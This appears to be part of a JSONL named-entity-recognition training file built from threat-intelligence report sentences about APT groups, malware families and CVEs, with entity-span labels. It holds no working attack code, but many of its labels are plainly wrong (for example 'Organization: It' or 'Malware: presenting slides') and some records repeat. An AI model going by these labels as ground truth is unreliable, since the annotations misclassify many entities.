1827]], "Organization: media outlets": [[1830, 1843]], "Organization: research centers": [[1846, 1862]], "Organization: election commissions": [[1865, 1885]], "Organization: Olympic organizations": [[1888, 1909]], "Organization: trading companies": [[1918, 1935]], "Organization: unknown entities": [[1948, 1964]], "Organization: Cisco Talos": [[1967, 1978]], "Organization: Operation Parliament": [[2099, 2119]], "Indicator: malware": [[2522, 2529], [2658, 2665], [2769, 2776]], "System: C&C": [[2696, 2699]], "Malware: CMD/PowerShell": [[2805, 2819]], "Organization: Operation Kingphish": [[3309, 3328]], "Organization: Voiceless": [[3600, 3609]], "System: email": [[3982, 3987]], "Organization: attacker": [[4009, 4017]], "Organization: Trade Union Confederation": [[4261, 4286]]}, "info": {"id": "aptner_train_005562", "source": "aptner_train"}}
{"text": "The PowerShell version of the Trojan also has the ability to get screenshots .", "spans": {"System: PowerShell": [[4, 14]], "Malware: Trojan": [[30, 36]]}, "info": {"id": "aptner_train_005568", "source": "aptner_train"}}
{"text": "The Trojan is quite similar to the .NET RocketMan Trojan Obviously and can handle the same commands; additionally , it includes the #screen” command to take a screenshot .", "spans": {"Malware: Trojan": [[4, 10], [50, 56]], "System: .NET": [[35, 39]], "Malware: RocketMan": [[40, 49]]}, "info": {"id": "aptner_train_005569", "source": "aptner_train"}}
{"text": "Winnti mode of operation to collect information on the organizational charts of companies , on cooperating departments , on the IT systems of individual business units , and on trade secrets , obviously . Hackers usually take precautions , which experts refer to as Opsec .", "spans": {"Organization: Winnti": [[0, 6]], "Organization: charts of companies": [[70, 89]], "Organization: individual business units": [[142, 167]], "Organization: Hackers": [[205, 212]]}, "info": {"id": "aptner_train_005571", "source": "aptner_train"}}
{"text": "The Winnti group’s Opsec was dismal to say the least . This mode of operation is typical of many hacker groups—and especially of Winnti .", "spans": {"Organization: Winnti": [[4, 10], [129, 135]], "Organization: hacker": [[97, 103]]}, "info": {"id": "aptner_train_005572", "source": "aptner_train"}}
{"text": "By 2014 , the Winnti malware code was no longer limited to game manufacturers . Winnti is targeting high-tech companies as well as chemical and pharmaceutical companies . Winnti is attacking companies in Japan , France , the U.S. and Germany . The Winnti hackers broke into Henkel’s network in 2014 . Henkel confirms the Winnti incident and issues the following statement: The cyberattack was discovered in the summer of 2014 and Henkel promptly took all necessary precautions . Far from attacking Henkel and the other companies arbitrarily , Winnti takes a highly strategic approach . The hackers behind Winnti have also set their sights on Japan’s biggest chemical company , Shin-Etsu Chemical . In the case of another Japanese company , Sumitomo Electric , Winnti apparently penetrated their networks during the summer of 2016 . Winnti hackers also penetrated the BASF and Siemens networks . Thanks to this tool , we found out back in March 2019 that the Bayer pharmaceutical group had been hacked by Winnti . At Gameforge , the Winnti hackers had already been removed from the networks when a staff member noticed a Windows start screen with Chinese characters . To witnesses , the spy appears to be running a program showing videos , presenting slides ( Prezi ) , playing a computer game or even running a fake virus scanner .", "spans": {"Organization: Winnti": [[14, 20], [80, 86], [171, 177], [248, 254], [321, 327], [543, 549], [760, 766], [832, 838], [1004, 1010], [1032, 1038], [605, 611]], "Organization: game manufacturers": [[59, 77]], "Organization: high-tech companies": [[100, 119]], "Organization: pharmaceutical companies": [[144, 168]], "Organization: Henkel’s": [[274, 282]], "Organization: Henkel": [[301, 307], [498, 504]], "Organization: chemical company": [[658, 674]], "Organization: Shin-Etsu Chemical": [[677, 695]], "Organization: Sumitomo Electric": [[740, 757]], "Organization: BASF": [[867, 871]], "Organization: Siemens": [[876, 883]], "Organization: networks": [[884, 892]], "Organization: Bayer pharmaceutical": [[958, 978]], "Organization: Gameforge": [[1016, 1025]], "System: Windows": [[1120, 1127]], "Organization: spy": [[1186, 1189]], "Malware: presenting slides": [[1239, 1256]], "Malware: Prezi": [[1259, 1264]]}, "info": {"id": "aptner_train_005576", "source": "aptner_train"}}
{"text": "Group-IB specialists have established that the aim of the attack was to deliver and launch the second stage of Silence’s Trojan , known as Silence.MainModule .", "spans": {"Organization: Group-IB": [[0, 8]], "Organization: Silence’s": [[111, 120]], "Malware: Trojan": [[121, 127]], "Malware: Silence.MainModule": [[139, 157]]}, "info": {"id": "aptner_train_005592", "source": "aptner_train"}}
{"text": "Silence attacked financial organisations in the UK . Silence conducted the first stage of their Asian campaign , organising a massive phishing attack aimed at receiving an up-to-date list of current recipients in different countries for further targeted attacks delivering their malicious software . The attackers used the server deployed on 6 June 2019 to control compromised workstations in these banks . On 24 March 2019 , Silence.ProxyBot ( MD5 2fe01a04d6beef14555b2cf9a717615c ) was uploaded to VirusTotal from an IP address in Sri Lanka . On October 18th , 2018 , the group sent out emails to British financial companies as part of their preparatory campaign . Group-IB experts established that the server 185.20.187.89 started functioning no later than 28 January 2019 . According to local media reports , in 2019 Silence successfully withdrew money from the Bangladeshi bank twice within 2 months . To do this , the actor may have used a unique tool called Atmosphere , a Trojan developed by Silence to remotely control ATM dispensers , or a similar program called xfs-disp.exe , which the actor may have used in their attack on IT Bank . As we described in Silence: Moving into the darkside report , Silence has experience with theft using compromised card processing systems . In February 2019 , Russian media7 reported a Silence attack on IT Bank in the city of Omsk . On 16 January 2019 , Silence sent out phishing emails with malicious attachments disguised as invitations to the International Financial Forum iFin-2019 .", "spans": {"Organization: Silence": [[0, 7], [53, 60], [821, 828], [1000, 1007], [1209, 1216], [1401, 1408]], "Organization: financial": [[17, 26], [607, 616]], "Organization: attackers": [[304, 313]], "Organization: banks": [[399, 404]], "Malware: Silence.ProxyBot": [[426, 442]], "Indicator: 2fe01a04d6beef14555b2cf9a717615c": [[449, 481]], "System: VirusTotal": [[500, 510]], "System: emails": [[589, 595], [1427, 1433]], "Organization: Group-IB": [[667, 675]], "Organization: bank": [[878, 882]], "Malware: Atmosphere": [[965, 975]], "Malware: Trojan": [[980, 986]], "Indicator: xfs-disp.exe": [[1073, 1085]], "Organization: Bank": [[1140, 1144]], "Organization: Silence:": [[1166, 1174]], "Organization: Financial": [[1507, 1516]]}, "info": {"id": "aptner_train_005593", "source": "aptner_train"}}
{"text": "TA505 is also using FlowerPippi ( Backdoor.Win32.FLOWERPIPPI.A ) , a new backdoor that we found them using in their campaigns against targets in Japan , India , and Argentina . TA505 targeted Middle Eastern countries in a June 11 campaign that delivered more than 90% of the total spam emails to the UAE , Saudi Arabia , and Morroco . It fetches the same FlawedAmmyy downloader .msi file , then downloads the FlawedAmmyy payload . TA505 used Wizard (.wiz) files in this campaign , with FlawedAmmyy RAT as the final payload . On June 14 , we saw TA505’s campaign still targeting UAE with similar tactics and techniques , but this time , some of the spam emails were delivered via the Amadey botnet . It later delivered an information stealer named EmailStealer , ” which stolesimple mail transfer protocol ( SMTP ) credentials and email addresses in the victim’s machine . On June 18 , the majority of the campaign’s spam emails were sent with the subject , Your RAKBANK Tax Invoice / Tax Credit Note” or Confirmation . This campaign used the abovementioned .HTML file , malicious Excel/Word document VBA macro , the FlawedAmmyy payload , and Amadey . On June 24 , we found another campaign targeting Lebanon with the ServHelper malware . On June 17 , we observed the campaign’s spam emails delivering malware-embedded Excel files directly as an attachment . On June 20 , we spotted the campaign’s spam emails delivering .doc and .xls files . Nonetheless , these spam emails were not delivered to the UAE or Arabic-speaking users , but to banks in Asian countries such as India , Indonesia , and the Philippines . After our analysis , we found that Proofpoint reported this malware as AndroMut as well . In the campaign that targeted Japan , Philippines , and Argentina on June 20 , we found what seems to be a new , undisclosed malware , which we named Gelup . Another new malware we found that TA505 is using in their campaigns last June 20 against targets in Japan , the Philippines , and Argentina is FlowerPippi . The malicious email contains a highly suspicious sample which triggered the ZLAB team to investigate its capabilities and its possible attribution , discovering a potential expansion of the TA505 operation . The attack , as stated by CyberInt , leveraged a command and control server located in Germany related to the TA505 actor: a very active group involved in cyber-criminal operation all around the world , threatening a wide range of high profile companies , active since 2014 . The comparison of the infection chains reveals in both cases TA505 used a couple of SFX stages to deploy the RMS” software: a legitimate remote administration tool produced by the Russian company TektonIT . The TA505 group is one of the most active threat groups operating since 2014 , it has traditionally targeted Banking and Retail industries , as we recently documented during the analysis of the Stealthy email Stealer” part of their arsenal . Also , some code pieces are directly re-used in the analyzed campaigns , such as the i.cmd” and exit.exe” files , and , at the same time , some new components have been introduced , for instance the rtegre.exe” and the veter1605_MAPS_10cr0.exe” file . In 2018 , Kaspersky Labs published a report that analyzed a Turla PowerShell loader that was based on the open-source project Posh-SecMod . Turla is believed to have been operating since at least 2008 , when it successfully breached the US military . This is not the first time Turla has used PowerShell in-memory loaders to increase its chances of bypassing security products . However , it is likely the same scripts are used more globally against many traditional Turla targets in Western Europe and the Middle East . In some samples deployed since March 2019 , Turla developers modified their PowerShell scripts in order to bypass the Antimalware Scan Interface ( AMSI ) .", "spans": {"Organization: TA505": [[0, 5], [177, 182], [431, 436], [1895, 1900], [2208, 2213], [2336, 2341], [2563, 2568], [2713, 2718]], "Malware: FlowerPippi": [[20, 31], [2004, 2015]], "Malware: Backdoor.Win32.FLOWERPIPPI.A": [[34, 62]], "Malware: backdoor": [[73, 81]], "System: emails": [[286, 292], [653, 659], [921, 927], [1283, 1289], [1402, 1408]], "Organization: It": [[335, 337], [699, 701]], "Malware: FlawedAmmyy payload": [[409, 428], [1116, 1135]], "Malware: Wizard (.wiz) files": [[442, 461]], "Malware: FlawedAmmyy RAT": [[486, 501]], "Organization: TA505’s": [[545, 552]], "Malware: Amadey botnet": [[683, 696]], "Malware: EmailStealer": [[747, 759]], "System: email": [[830, 835], [2032, 2037], [2912, 2917]], "System: .HTML": [[1057, 1062]], "System: Excel/Word": [[1080, 1090]], "Malware: macro": [[1104, 1109]], "Malware: Amadey": [[1142, 1148]], "Indicator: ServHelper": [[1217, 1227]], "Indicator: spam emails": [[1462, 1473]], "Organization: banks": [[1538, 1543]], "Organization: Proofpoint": [[1648, 1658]], "Organization: AndroMut": [[1684, 1692]], "Indicator: Gelup": [[1853, 1858]], "Organization: ZLAB": [[2094, 2098]], "Organization: high profile companies": [[2457, 2479]], "Malware: remote administration tool": [[2639, 2665]], "Organization: Banking": [[2818, 2825]], "Organization: Retail": [[2830, 2836]], "Indicator: i.cmd”": [[3036, 3042]], "Indicator: exit.exe”": [[3047, 3056]], "Indicator: rtegre.exe”": [[3150, 3161]], "Indicator: veter1605_MAPS_10cr0.exe”": [[3170, 3195]], "Organization: Kaspersky": [[3213, 3222]], "Organization: Turla": [[3263, 3268], [3343, 3348], [3481, 3486], [3670, 3675], [3768, 3773]], "Malware: PowerShell loader": [[3269, 3286]], "Organization: military": [[3443, 3451]], "System: PowerShell": [[3496, 3506], [3800, 3810]], "System: Antimalware Scan Interface": [[3842, 3868]], "System: AMSI": [[3871, 3875]]}, "info": {"id": "aptner_train_005599", "source": "aptner_train"}}
{"text": "It also reconfigures the Microsoft Sysinternals registry to prevent pop-ups when running the PsExec tool . Waterbug also used an older version of PowerShell , likely to avoid logging . In one of these campaigns , Waterbug used a USB stealer that scans removable storage devices to identify and collect files of interest . The malware then uses WebDAV to upload the RAR archive to a Box account .", "spans": {"Organization: Microsoft": [[25, 34]], "Malware: PsExec tool": [[93, 104]], "Organization: Waterbug": [[107, 115], [213, 221]], "System: PowerShell": [[146, 156]], "Malware: USB stealer": [[229, 240]], "Indicator: malware": [[326, 333]], "Malware: WebDAV": [[344, 350]], "Indicator: RAR archive": [[365, 376]]}, "info": {"id": "aptner_train_005601", "source": "aptner_train"}}
{"text": "The DeepSight Managed Adversary and Threat Intelligence team co-authored this blog and its customers have received intelligence with additional details about these campaigns , the characteristics of the Waterbug ( aka Turla ) Cyber Espionage group , and methods of detecting and thwarting activities of this adversary . The DeepSight MATI team authored this blog and its customers have received intelligence with additional details about these campaigns , the characteristics of the Waterbug Cyber Espionage group , and methods of detecting and thwarting activities of this adversary . While reviewing a 2015 report⁵ of a Winnti intrusion at a Vietnamese gaming company , we identified a small cluster of Winnti⁶ samples designed specifically for Linux⁷ . Following these reports , Chronicle researchers doubled down on efforts to try to unravel the various campaigns where Winnti was leveraged . Distinct changes to Azazel by the Winnti developers include the addition of a function named ‘Decrypt2’ , which is used to decode an embedded configuration similar to the core implant . Zebrocy activity initiates with spearphishing operations delivering various target profilers and downloaders without the use of any 0day exploits . We will see more from Zebrocy into 2019 on government and military related organizations . The PowerShell script will look at the architecture of the system to check which malicious DLL files should be downloaded . In the same year , Silence conducted DDoS attacks using the Perl IRC bot and public IRC chats to control Trojans . \bThe FBI issued a rare bulletin admitting that a group named APT6 hacked into US government computer systems as far back as 2011 and for years stole sensitive data . \bFireEye iSIGHT Intelligence believes that APT37 is aligned with the activity publicly reported as Scarcruft and Group123 . \bTrend Micro attributes this activity to MuddyWater , an Iran-nexus actor that has been active since at least May 2017 . \bFireEye assess that the actors employing this latest Flash zero-day are a suspected North Korean group we track as TEMP.Reaper . FireEye has observed other suspected North Korean threat groups such as TEMP.Hermit employ wiper malware in disruptive attacks . On Nov14 , 2017 , FireEye observed APT34 using an exploit for the Microsoft Office vulnerability to target a government organization in the Middle East . Kaspersky reveals that APT33 is a capable group that has carried out Cyber Espionage operations since at least 2013 . APT33 is the only group that Kaspersky has observed use the DROPSHOT dropper . The Cyber Espionage group APT32 heavily obfuscates their backdoors and scripts , and Mandiant consultants observed APT32 implement additional command argument obfuscation in April 2017 . In all Mandiant investigations to date where the CARBANAK backdoor has been discovered , the activity has been attributed to the FIN7 threat group . Kaspersky released a similar report about the same group under the name Carbanak in February 2015 . FireEye assesses that APT32 leverages a unique suite of fully-featured malware . FireEye has observed APT32 targeting foreign corporations with a vested interest in Vietnam’s manufacturing , consumer products , and hospitality sectors . The FireEye iSIGHT Intelligence MySIGHT Portal contains additional information on these backdoor families based on Mandiant investigations of APT32 intrusions . FireEye assesses that APT32 is a Cyber Espionage group aligned with Vietnamese government interests . In May and June 2017 , FireEye has associated this campaign with APT19 , a group that we assess is composed of freelancers , with some degree of sponsorship by the Chinese government . APT10 is a Chinese Cyber Espionage group that FireEye has tracked since 2009 . In addition to the spear phishes , FireEye ISIGHT Intelligence has observed APT10 accessing victims through global service providers . FireEye’s visibility into the operations of APT28 – a group we believe the Russian government sponsors – has given us insight into some of the government’s targets , as well as its objectives and the activities designed to further them . FireEye has tracked and profiled APT28 group through multiple investigations , endpoint and network detections , and continuous monitoring . In April 2015 , FireEye uncovered the malicious efforts of APT30 , a suspected China-based threat group . FireEye iSIGHT Intelligence has been tracking a pair of cybercriminals that we refer to as the Vendetta Brothers . Google and Microsoft have already confirmed the Russian hacker group APT28 used a Flash vulnerability CVE-2016-7855 along with this kernel privilege escalation flaw to perform a targeted attack .", "spans": {"Organization: DeepSight Managed Adversary": [[4, 31]], "Organization: Threat Intelligence": [[36, 55]], "Organization: Waterbug": [[203, 211], [483, 491]], "Organization: Turla": [[218, 223]], "Organization: DeepSight MATI team": [[324, 343]], "Organization: Winnti": [[622, 628], [874, 880]], "Organization: Vietnamese gaming company": [[644, 669]], "Organization: Winnti⁶": [[705, 712]], "Organization: Chronicle": [[782, 791]], "Malware: Azazel": [[917, 923]], "Organization: Winnti developers": [[931, 948]], "Organization: Zebrocy": [[1083, 1090], [1253, 1260]], "Vulnerability: 0day": [[1215, 1219]], "Vulnerability: exploits": [[1220, 1228]], "Organization: government": [[1274, 1284], [3495, 3505]], "Organization: military": [[1289, 1297]], "Malware: PowerShell script": [[1326, 1343]], "Indicator: malicious DLL files": [[1403, 1422]], "Organization: Silence": [[1465, 1472]], "Malware: Perl IRC bot": [[1506, 1518]], "Malware: public IRC": [[1523, 1533]], "Organization: FBI": [[1566, 1569]], "Organization: APT6": [[1622, 1626]], "Organization: US government": [[1639, 1652]], "Organization: \bFireEye iSIGHT": [[1727, 1742]], "Organization: APT37": [[1770, 1775]], "Organization: Scarcruft": [[1826, 1835]], "Organization: Group123": [[1840, 1848]], "Organization: \bTrend Micro": [[1851, 1863]], "Organization: MuddyWater": [[1892, 1902]], "Organization: actor": [[1919, 1924]], "Organization: \bFireEye": [[1972, 1980]], "Organization: actors": [[1997, 2003]], "System: Flash": [[2026, 2031], [4599, 4604]], "Organization: TEMP.Reaper": [[2088, 2099]], "Organization: FireEye": [[2102, 2109], [2249, 2256], [3018, 3025], [3099, 3106], [3259, 3266], [3416, 3423], [3541, 3548], [3749, 3756], [4155, 4162], [4312, 4319]], "Organization: TEMP.Hermit": [[2174, 2185]], "Organization: APT34": [[2266, 2271]], "Vulnerability: exploit": [[2281, 2288]], "Organization: Microsoft": [[2297, 2306], [4528, 4537]], "Vulnerability: vulnerability": [[2314, 2327]], "Organization: government organization": [[2340, 2363]], "Organization: Kaspersky": [[2385, 2394], [2532, 2541], [2918, 2927]], "Organization: APT33": [[2408, 2413], [2503, 2508]], "Malware: DROPSHOT dropper": [[2563, 2579]], "Organization: APT32": [[2608, 2613], [2697, 2702], [3120, 3125], [3397, 3402], [3438, 3443]], "Malware: backdoors": [[2639, 2648]], "Malware: scripts": [[2653, 2660]], "Organization: Mandiant": [[2776, 2784], [3370, 3378]], "Organization: FIN7": [[2898, 2902]], "Organization: Carbanak": [[2990, 2998]], "Organization: Vietnam’s manufacturing": [[3183, 3206]], "Organization: consumer products": [[3209, 3226]], "Organization: hospitality": [[3233, 3244]], "Organization: iSIGHT": [[3267, 3273]], "Organization: Vietnamese": [[3484, 3494]], "Organization: APT19": [[3583, 3588]], "Organization: Chinese government": [[3682, 3700]], "Organization: APT10": [[3703, 3708], [3858, 3863]], "Organization: FireEye ISIGHT Intelligence": [[3817, 3844]], "Organization: FireEye’s": [[3917, 3926]], "Organization: APT28": [[3961, 3966], [4188, 4193], [4586, 4591]], "Organization: Russian government": [[3992, 4010]], "Organization: APT30": [[4355, 4360]], "Organization: FireEye iSIGHT": [[4402, 4416]], "Organization: Vendetta Brothers": [[4497, 4514]], "Organization: Google": [[4517, 4523]], "Vulnerability: CVE-2016-7855": [[4619, 4632]]}, "info": {"id": "aptner_train_005602", "source": "aptner_train"}}
{"text": "The initial indicator of the attack was a malicious Web shell that was detected on an IIS server , coming out of the w3wp.exe process .", "spans": {"System: Web shell": [[52, 61]], "System: IIS": [[86, 89]], "Indicator: w3wp.exe": [[117, 125]]}, "info": {"id": "aptner_train_005609", "source": "aptner_train"}}
{"text": "The malware may inject itself into browser processes and explorer.exe .", "spans": {"Malware: malware": [[4, 11]], "Indicator: explorer.exe": [[57, 69]]}, "info": {"id": "aptner_train_005611", "source": "aptner_train"}}
{"text": "The samples we identified target the ATM vendor Diebold .", "spans": {"Indicator: samples": [[4, 11]], "Organization: ATM vendor Diebold": [[37, 55]]}, "info": {"id": "aptner_train_005649", "source": "aptner_train"}}
{"text": "There was code to download a decoy document from the Internet and open it in a second winword.exe process using the Start-Process cmdlet .", "spans": {"Indicator: winword.exe": [[86, 97]], "Indicator: Start-Process": [[116, 129]], "Indicator: cmdlet": [[130, 136]]}, "info": {"id": "aptner_train_005657", "source": "aptner_train"}}
{"text": "One of them – ipv4.dll – has been placed by the APT with what is , in fact , a downloader for other malicious components .", "spans": {"Indicator: ipv4.dll": [[14, 22]], "Malware: downloader": [[79, 89]]}, "info": {"id": "aptner_train_005660", "source": "aptner_train"}}
{"text": "Documents with the flash exploit managed to evade static defenses and remain undetected as an exploit on VirusTotal .", "spans": {"Indicator: Documents": [[0, 9]], "System: flash": [[19, 24]], "Vulnerability: exploit": [[25, 32], [94, 101]], "System: VirusTotal": [[105, 115]]}, "info": {"id": "aptner_train_005684", "source": "aptner_train"}}
{"text": "Some of the documents exploited CVE-2017-0199 to deliver the payload .", "spans": {"Indicator: documents": [[12, 21]], "Vulnerability: CVE-2017-0199": [[32, 45]]}, "info": {"id": "aptner_train_005690", "source": "aptner_train"}}
{"text": "These emails included recruitment-themed lures and links to malicious HTML Application ( HTA ) files .", "spans": {"System: emails": [[6, 12]], "System: HTML Application": [[70, 86]], "System: HTA": [[89, 92]]}, "info": {"id": "aptner_train_005699", "source": "aptner_train"}}
{"text": "Upon successful exploitation , the attachment will install the Trojan known as NetTraveler using a DLL side-loading attack technique .", "spans": {"Indicator: attachment": [[35, 45]], "Malware: Trojan": [[63, 69]], "Malware: NetTraveler": [[79, 90]], "Indicator: DLL side-loading": [[99, 115]]}, "info": {"id": "aptner_train_005800", "source": "aptner_train"}}
{"text": "this RTF exploits again the CVE-2017-1882 on eqnedt32.exe .", "spans": {"System: RTF": [[5, 8]], "Vulnerability: CVE-2017-1882": [[28, 41]], "Indicator: eqnedt32.exe": [[45, 57]]}, "info": {"id": "aptner_train_005838", "source": "aptner_train"}}
{"text": "This includes Python scripts . Usually , the Stageless Meterpreter has the Ext_server_stdapi.x64.dll” , Ext_server_extapi.x64.dll” , and Ext_server_espia.x64.dll” extensions .", "spans": {"System: Python": [[14, 20]], "Indicator: Stageless Meterpreter": [[45, 66]], "Indicator: Ext_server_stdapi.x64.dll”": [[75, 101]], "Indicator: Ext_server_extapi.x64.dll”": [[104, 130]], "Indicator: Ext_server_espia.x64.dll”": [[137, 162]]}, "info": {"id": "aptner_train_005883", "source": "aptner_train"}}
{"text": "we identified two methods to deliver the KerrDown downloader to targets .", "spans": {"Indicator: KerrDown": [[41, 49]]}, "info": {"id": "aptner_train_005886", "source": "aptner_train"}}
{"text": "we believe the iOS malware gets installed on already compromised systems , and it is very similar to next stage SEDNIT malware we have found for Microsoft Windows’ systems .", "spans": {"Indicator: SEDNIT": [[112, 118]], "Organization: Microsoft": [[145, 154]]}, "info": {"id": "aptner_train_005910", "source": "aptner_train"}}
{"text": "These campaign-related VPSs are located in South Africa . The tool does all that a typical Trojan needs to accomplish: upload , download and execute files , fingerprint target systems .", "spans": {"Organization: VPSs": [[23, 27]], "Indicator: Trojan": [[91, 97]]}, "info": {"id": "aptner_train_005927", "source": "aptner_train"}}
{"text": "The PowerShell version of the Trojan also has the ability to get screenshots .", "spans": {"System: PowerShell": [[4, 14]], "Malware: Trojan": [[30, 36]]}, "info": {"id": "aptner_train_005928", "source": "aptner_train"}}
{"text": "China Chopper contains a remote shell ( Virtual Terminal ) function that has a first suggested command of netstat an|find ESTABLISHED .", "spans": {"Indicator: China Chopper": [[0, 13]], "System: Virtual Terminal": [[40, 56]]}, "info": {"id": "aptner_train_005937", "source": "aptner_train"}}
{"text": "Our investigation showed that these attacks were targeted , and that the threat actor sought to steal communications data of specific individuals in various countries .", "spans": {"Organization: specific individuals": [[125, 145]]}, "info": {"id": "aptner_train_005951", "source": "aptner_train"}}
{"text": "CapabilitiesFormBook is a data stealer , but not a full-fledged banker .", "spans": {"Organization: CapabilitiesFormBook": [[0, 20]], "Organization: banker": [[64, 70]]}, "info": {"id": "aptner_train_005952", "source": "aptner_train"}}
{"text": "On November 10 , 2015 , threat actors sent a spear-phishing email to an individual at the French Ministry of Foreign Affairs .", "spans": {"Organization: actors": [[31, 37]], "Organization: individual": [[72, 82]]}, "info": {"id": "aptner_train_006006", "source": "aptner_train"}}
{"text": "LEAD and Barium are not known for large-scale spear-phishing , so it is unlikely that SOC personnel would have to deal with multiple machines having been compromised by these groups at the same time .", "spans": {"Organization: Barium": [[9, 15]], "Organization: SOC personnel": [[86, 99]]}, "info": {"id": "aptner_train_006069", "source": "aptner_train"}}
{"text": "This could include diplomats , experts in the LOCs of interest related to the Digital Economy Task Force , or possibly even journalists .", "spans": {"Organization: diplomats": [[19, 28]], "Organization: journalists": [[124, 135]]}, "info": {"id": "aptner_train_006093", "source": "aptner_train"}}
{"text": "Our investigation showed that these attacks were targeted , and that the threat actor sought to steal communications data of specific individuals in various countries .", "spans": {"Organization: specific individuals": [[125, 145]]}, "info": {"id": "aptner_train_006108", "source": "aptner_train"}}
{"text": "CapabilitiesFormBook is a data stealer , but not a full-fledged banker .", "spans": {"Organization: CapabilitiesFormBook": [[0, 20]], "Organization: banker": [[64, 70]]}, "info": {"id": "aptner_train_006109", "source": "aptner_train"}}
{"text": "On November 10 , 2015 , threat actors sent a spear-phishing email to an individual at the French Ministry of Foreign Affairs .", "spans": {"Organization: actors": [[31, 37]], "Organization: individual": [[72, 82]]}, "info": {"id": "aptner_train_006163", "source": "aptner_train"}}
{"text": "LEAD and Barium are not known for large-scale spear-phishing , so it is unlikely that SOC personnel would have to deal with multiple machines having been compromised by these groups at the same time .", "spans": {"Organization: Barium": [[9, 15]], "Organization: SOC personnel": [[86, 99]]}, "info": {"id": "aptner_train_006226", "source": "aptner_train"}}
{"text": "This could include diplomats , experts in the LOCs of interest related to the Digital Economy Task Force , or possibly even journalists .", "spans": {"Organization: diplomats": [[19, 28]], "Organization: journalists": [[124, 135]]}, "info": {"id": "aptner_train_006250", "source": "aptner_train"}}
{"text": "It is possible that CVE-2017-8759 was being used by additional actors .", "spans": {"Vulnerability: CVE-2017-8759": [[20, 33]], "Organization: actors": [[63, 69]]}, "info": {"id": "aptner_train_006268", "source": "aptner_train"}}
{"text": "The malware leverages an exploit , codenamed EternalBlue , that was released by the Shadow Brokers on April 14 , 2017 .", "spans": {"Vulnerability: exploit": [[25, 32]], "Vulnerability: EternalBlue": [[45, 56]], "Organization: Shadow Brokers": [[84, 98]]}, "info": {"id": "aptner_train_006271", "source": "aptner_train"}}
{"text": "Some hackers even went onto use the Cisco exploits in the wild .", "spans": {"Organization: Cisco": [[36, 41]], "Vulnerability: exploits": [[42, 50]]}, "info": {"id": "aptner_train_006272", "source": "aptner_train"}}
{"text": "The Word document usually exploits CVE-2012-0158 .", "spans": {"System: Word": [[4, 8]], "Vulnerability: CVE-2012-0158": [[35, 48]]}, "info": {"id": "aptner_train_006281", "source": "aptner_train"}}
{"text": "The Word document usually exploits CVE-2012-0158 .", "spans": {"System: Word": [[4, 8]], "Vulnerability: CVE-2012-0158": [[35, 48]]}, "info": {"id": "aptner_train_006297", "source": "aptner_train"}}
{"text": "The group has demonstrated access to zero-day vulnerabilities CVE-2018-0802 , and the ability to incorporate them into operations .", "spans": {"Vulnerability: zero-day": [[37, 45]], "Vulnerability: CVE-2018-0802": [[62, 75]]}, "info": {"id": "aptner_train_006321", "source": "aptner_train"}}
{"text": "APT28 is using novel techniques involving the EternalBlue exploits and the open source tool Responder to spread laterally through networks and likely target travelers .", "spans": {"Organization: APT28": [[0, 5]], "Vulnerability: EternalBlue": [[46, 57]], "Vulnerability: exploits": [[58, 66]], "Malware: open source tool": [[75, 91]], "Malware: Responder": [[92, 101]]}, "info": {"id": "aptner_train_006339", "source": "aptner_train"}}
{"text": "Documents with the flash exploit managed to evade static defenses and remain undetected as an exploit on VirusTotal .", "spans": {"Indicator: Documents": [[0, 9]], "System: flash": [[19, 24]], "Vulnerability: exploit": [[25, 32], [94, 101]], "System: VirusTotal": [[105, 115]]}, "info": {"id": "aptner_train_006378", "source": "aptner_train"}}
{"text": "The EternalBlue exploits from the framework received worldwide attention after being used in the ransomware campaigns WannaCry in May and Petya / NotPetya in June 2017 .", "spans": {"Vulnerability: EternalBlue": [[4, 15]], "Vulnerability: exploits": [[16, 24]], "Malware: Petya": [[138, 143]], "Malware: NotPetya": [[146, 154]]}, "info": {"id": "aptner_train_006385", "source": "aptner_train"}}
{"text": "Some of the documents exploited CVE-2017-0199 to deliver the payload .", "spans": {"Indicator: documents": [[12, 21]], "Vulnerability: CVE-2017-0199": [[32, 45]]}, "info": {"id": "aptner_train_006389", "source": "aptner_train"}}
{"text": "The documents that exploit CVE-2017-11882 download another payload — an HTML Application ( HTA ) file toting a malicious Visual Basic ( VBS ) script — from the server , which is executed accordingly by the command-line tool mshta.exe .", "spans": {"Vulnerability: exploit": [[19, 26]], "Vulnerability: CVE-2017-11882": [[27, 41]], "System: HTML Application": [[72, 88]], "System: HTA": [[91, 94]], "System: Visual Basic": [[121, 133]], "System: VBS": [[136, 139]], "Indicator: mshta.exe": [[224, 233]]}, "info": {"id": "aptner_train_006449", "source": "aptner_train"}}
{"text": "Earlier this month , Securelist 's technology caught another zero-day exploits deployed in targeted attacks .", "spans": {"Organization: Securelist": [[21, 31]], "Vulnerability: zero-day": [[61, 69]]}, "info": {"id": "aptner_train_006466", "source": "aptner_train"}}
{"text": "Earlier this month , we caught another zero-day Adobe Flash Player exploits deployed in targeted attacks .", "spans": {"Vulnerability: zero-day": [[39, 47]], "System: Adobe Flash Player": [[48, 66]]}, "info": {"id": "aptner_train_006474", "source": "aptner_train"}}
{"text": "Another set of attacks called Operation Erebus leverages another flash exploit , CVE-2016-4117 , and relies on watering hole attacks as a means of propagation .", "spans": {"System: flash": [[65, 70]], "Vulnerability: exploit": [[71, 78]], "Vulnerability: CVE-2016-4117": [[81, 94]]}, "info": {"id": "aptner_train_006481", "source": "aptner_train"}}
{"text": "One vulnerability is a Windows zero-day vulnerability ( CVE-2019-0703 ) discovered by Symantec . Bemstour exploits two Windows vulnerabilities in order to achieve remote kernel code execution on targeted computers .", "spans": {"System: Windows": [[23, 30], [119, 126]], "Vulnerability: zero-day": [[31, 39]], "Vulnerability: CVE-2019-0703": [[56, 69]], "Organization: Symantec": [[86, 94]], "Organization: Bemstour": [[97, 105]], "Vulnerability: vulnerabilities": [[127, 142]]}, "info": {"id": "aptner_train_006489", "source": "aptner_train"}}
{"text": "The second Windows vulnerability ( CVE-2017-0143 ) was patched in March 2017 after it was discovered to have been used by two exploit tools—EternalRomance and EternalSynergy—that were also released as part of the Shadow Brokers leak .", "spans": {"System: Windows": [[11, 18]], "Vulnerability: exploit": [[126, 133]], "Organization: Shadow Brokers": [[213, 227]]}, "info": {"id": "aptner_train_006490", "source": "aptner_train"}}
{"text": "The zero-day vulnerability found and reported by Symantec CVE-2019-0703 occurs due to the ACT the Windows SMB Server handles certain requests .", "spans": {"Vulnerability: zero-day": [[4, 12]], "Organization: Symantec": [[49, 57]], "Vulnerability: CVE-2019-0703": [[58, 71]], "System: Windows": [[98, 105]]}, "info": {"id": "aptner_train_006492", "source": "aptner_train"}}
